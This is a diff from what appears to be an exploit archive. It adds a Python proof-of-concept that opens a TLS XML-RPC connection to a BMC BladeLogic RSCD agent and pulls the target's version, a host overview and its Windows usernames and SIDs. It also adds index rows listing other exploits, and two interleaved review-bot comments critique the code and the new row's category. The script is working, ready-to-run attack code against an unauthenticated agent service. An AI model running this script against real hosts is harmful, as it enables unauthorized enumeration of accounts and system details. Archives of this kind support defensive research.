self.unix_socket_url = unix_socket_url + self.timeout = timeout + + def connect(self): + self.sock = wrappedSocket + + +class MyHTTPConnectionPool(HTTPConnectionPool): + def __init__(self, socket_path, timeout=60): + HTTPConnectionPool.__init__(self, HOST, timeout=timeout) + self.socket_path = socket_path + self.timeout = timeout + + def _new_conn(self): + return MyHTTPConnection(self.socket_path, self.timeout) + + +class MyAdapter(HTTPAdapter): + def __init__(self, timeout=60): + super(MyAdapter, self).__init__() + self.timeout = timeout + + def 
get_connection(self, socket_path, proxies=None): + return MyHTTPConnectionPool(socket_path, self.timeout) + + def request_url(self, request, proxies): + return request.path_url + + +def optParser(): + parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent") + parser.add_argument("host", help="IP address of a target system") + parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)") + opts = parser.parse_args() + return opts + + +init = """RemoteServer.intro2015-11-19-16-10-30-392095870;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;8.6.01.66""" +getVersion = """RemoteServer.getVersion""" +getWindowsUsers = """RemoteUser.getUserContentstypeNameOShost0.0.0.0containerstringvaluelongValue1kind1path/1""" +getHostOverview = """RemoteServer.getHostOverview""" + +options = optParser() +PORT = options.port +HOST = options.host + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((HOST, PORT)) + +sock.sendall("TLSRPC") + +wrappedSocket = ssl.wrap_socket(sock) + +adapter = MyAdapter() +s = requests.session() +s.mount("http://", adapter) + +print "Sending intro..." +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=init) + +print "Getting version..." +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getVersion) + +rootVersion = ET.fromstring(r.content) +print "=========================" +print "Major version : " + rootVersion[0][0][0][0][0][1].text +print "Minor version : " + rootVersion[0][0][0][0][1][1].text +print "Patch version : " + rootVersion[0][0][0][0][2][1].text +print "Platform version: " + rootVersion[0][0][0][0][3][1].text +print "=========================\n" + +print "Getting host overview..." 
+r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getHostOverview) + +rootOverview = ET.fromstring(r.content) +print rootOverview[0][0][0][0][12][1].text + +linux = False + +if rootOverview[0][0][0][0][0][1].text is not None: + linux = True + +print "==================================================" +print "Agent instal dir: " + rootOverview[0][0][0][0][1][1].text +print "Licensed? : " + ("false" if (int(rootOverview[0][0][0][0][2][1][0].text) == 0) else "true") +print "Repeater? : " + ("false" if (int(rootOverview[0][0][0][0][12][1][0].text) == 0) else "true") +print "Hostname : " + rootOverview[0][0][0][0][6][1].text +print "Netmask : " + rootOverview[0][0][0][0][13][1].text +print "CPU architecture: " + rootOverview[0][0][0][0][10][1].text +print "Platform (OS) : " + rootOverview[0][0][0][0][14][1].text +print "OS version : " + rootOverview[0][0][0][0][15][1].text +print "OS architecture : " + rootOverview[0][0][0][0][3][1].text +print "OS release : " + rootOverview[0][0][0][0][11][1].text +print "Patch level : " + rootOverview[0][0][0][0][7][1].text +print "==================================================\n" + +print "Sending request for users...\n" + +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getWindowsUsers) + +with open("./users.xml", "w") as text_file: + text_file.write(r.content) + +root = ET.parse('./users.xml').getroot() +count = 0 +ind = 1 +while ind: + try: + ind = root[0][0][0][0][0][count][0][14][1].text + except IndexError: + pass + break + count += 1 + +print "Number of users found: " + str(count) + "\n" +for i in range(0, count): + print "Username: "+ root[0][0][0][0][0][i][0][14][1].text + print "SID: " + root[0][0][0][0][0][i][0][12][1].text + print "Comment: " + root[0][0][0][0][0][i][0][2][1].text + + print "........................\n" + + +wrappedSocket.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b384f2901..24f49be83 100644 --- a/files_exploits.csv 
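Review bot: The users response is written to `./users.xml` in the operator's working directory and then re-read with `ET.parse`, although `r.content` is already in memory; `root = ET.fromstring(r.content)` replaces the `with open(...)` block and the `ET.parse` call and leaves no artifact behind. `ssl.wrap_socket(sock)` performs no certificate or hostname validation (the default is `CERT_NONE`), which is acceptable for a PoC against an agent with a self-signed certificate but should be stated in a comment so the `MyHTTPConnection` transport is not reused elsewhere as-is. The user loop relies on fixed positional indexes (`root[0][0][0][0][0][i][0][14][1]`) and stops at the first `IndexError`, so one record missing a field silently truncates the listing; a comment naming what each index is expected to hold would help the next reader. The XML-RPC request bodies (`init`, `getVersion`, `getWindowsUsers`, `getHostOverview`) appear with their markup stripped in this view, so their structure could not be reviewed.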
+++ b/files_exploits.csv @@ -5482,6 +5482,7 @@ id,file,description,date,author,type,platform,port 43903,exploits/multiple/dos/43903.txt,"Artifex MuJS 1.0.2 - Denial of Service",2018-01-28,"Andrea Sindoni",dos,multiple, 43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple, 43923,exploits/macos/dos/43923.c,"macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding",2018-01-29,"Google Security Research",dos,macos, +43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, @@ -9302,6 +9303,7 @@ id,file,description,date,author,type,platform,port 43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux, 43925,exploits/macos/local/43925.rb,"Arq 5.10 - Local Privilege Escalation (1)",2018-01-29,"Mark Wadham",local,macos, 43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos, +43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, 
@@ -15973,6 +15975,7 @@ id,file,description,date,author,type,platform,port 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple, 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux, 43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple, +43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 
@@ -37943,6 +37946,11 @@ id,file,description,date,author,type,platform,port 43918,exploits/php/webapps/43918.txt,"Buddy Zone 2.9.9 - SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php, 43919,exploits/hardware/webapps/43919.html,"Netis WF2419 Router - Cross-Site Request Forgery",2018-01-28,"Sajibe Kanti",webapps,hardware, 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs, +43928,exploits/windows/webapps/43928.py,"Advantech WebAccess < 8.3 - SQL Injection",2018-01-30,"Chris Lyne",webapps,windows, +43931,exploits/php/webapps/43931.txt,"Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal",2018-01-30,"Ihsan Sencan",webapps,php, +43932,exploits/php/webapps/43932.txt,"Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php, +43933,exploits/php/webapps/43933.txt,"Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php, +43934,exploits/windows/webapps/43934.py,"BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure",2018-01-30,"Paul Taylor",webapps,windows,4750 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
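Review bot: The new row for `43934` files it under `webapps,windows` with port 4750, but the script speaks raw TLS XML-RPC to the RSCD agent socket (`sock.sendall("TLSRPC")`, `ssl.wrap_socket`) rather than to a web application, and the existing row for the same agent, `43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution"`, is filed as `remote,multiple`; `remote,windows` for 43934 would be consistent with that entry. The other added rows match their files' headers.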